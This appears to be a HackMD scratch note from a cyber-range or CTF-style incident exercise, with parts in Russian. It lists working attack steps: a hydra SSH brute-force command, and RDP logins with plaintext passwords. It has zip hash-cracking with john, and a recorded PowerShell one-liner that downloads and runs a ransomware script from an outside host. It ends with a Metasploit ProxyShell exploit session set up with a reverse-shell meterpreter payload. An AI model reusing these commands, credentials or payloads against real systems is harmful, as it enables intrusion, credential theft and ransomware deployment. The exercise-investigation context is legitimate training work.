Buffer2 - HackMD

# Buffer2 ## Comands hydra -V -f -t 4 -l user -P Desktop/rockyou7.txt ssh://10.11.1.254 -rw-r--r-- 1 root www-data 90 Mar 5 10:31 11FLAG.txt.encr -rw-r--r-- 1 root www-data 8970 Mar 5 10:31 authorize.php.encr -rw-r--r-- 1 root www-data 1020 Mar 5 10:31 cron.php.encr -rw-r--r-- 1 root root 0 Mar 11 08:26 encr.sh -rw-r--r-- 1 root www-data 760 Mar 5 10:31 index.php.encr -rw-r--r-- 1 root www-data 975 Mar 5 10:31 install.php.encr -rw-r--r-- 1 root www-data 130 Mar 5 10:31 shell.php.encr -rw-r--r-- 1 root www-data 27105 Mar 5 10:31 update.php.encr -rw-r--r-- 1 root www-data 610 Mar 5 10:31 xmlrpc.php.encr /var/log/messages rdesktop -u Администратор -p Maggie1 10.11.239.5 10.11.4.10:/документы/11password.zip https://dropmefiles.com/A2yjV ```bash zip2john 11password.zip > zip.hashes john --wordlist=./rockyou7.txt zip.hashes ``` jonny -> pass 12994 ``` Password on FW with suricata and pcap logs user:Tinker1 ``` # Surricata: https://dropmefiles.com/Y08fi trf.pcap # Other admin@elto-portal2:/var/www/html$ cat 11FLAG.txt Accidit in puncto, quod non speratur in anno https://dropmefiles.com/eRISD https://github.com/horizon3ai/proxyshell.git https://michlstechblog.info/blog/powershell-en-and-decrypt-string-with-aes256/ ``` md5sum sploit 95c67d2fb318d6ac438533e419a8cc28 sploit ``` Действия атакующего в рамках этапа ` Шифрование данных ` Выполненная команда ОС ` cmd.exe /Q /c powershell.exe -ep bypass (new-object system.net.webclient).DownloadFile('http://10.11.200.50/Ransom.ps1','C:\Ransom.ps1');import-module C:\Ransom.ps1; Ransom -IP 10.11.200.50 1> \\127.0.0.1\ADMIN$\__1646476419.946397 2>&1 ` Активная УЗ пользователя ` company\Administrator ` Используемый инструмент/ПО ` powershell, System.Core.dll ` Имя вредоносного семпла ` Ransom.ps1 ` Хеш-сумма (md5) файлового семпла ` caa67f501acbecbc293e98dae7b86621 ` rdesktop -u Администратор -p Maggie1 10.11.4.10 ``` msf6 > use exploit/windows/http/exchange_proxyshell_rce [*] Using configured payload windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/http/exchange_proxyshell_rce) > set rhosts 10.11.3.20 rhosts => 10.11.3.20 msf6 exploit(windows/http/exchange_proxyshell_rce) > set lhost 10.11.5.12 lhost => 10.11.5.12 msf6 exploit(windows/http/exchange_proxyshell_rce) > set lport 13378 lport => 13378 msf6 exploit(windows/http/exchange_proxyshell_rce) > run ```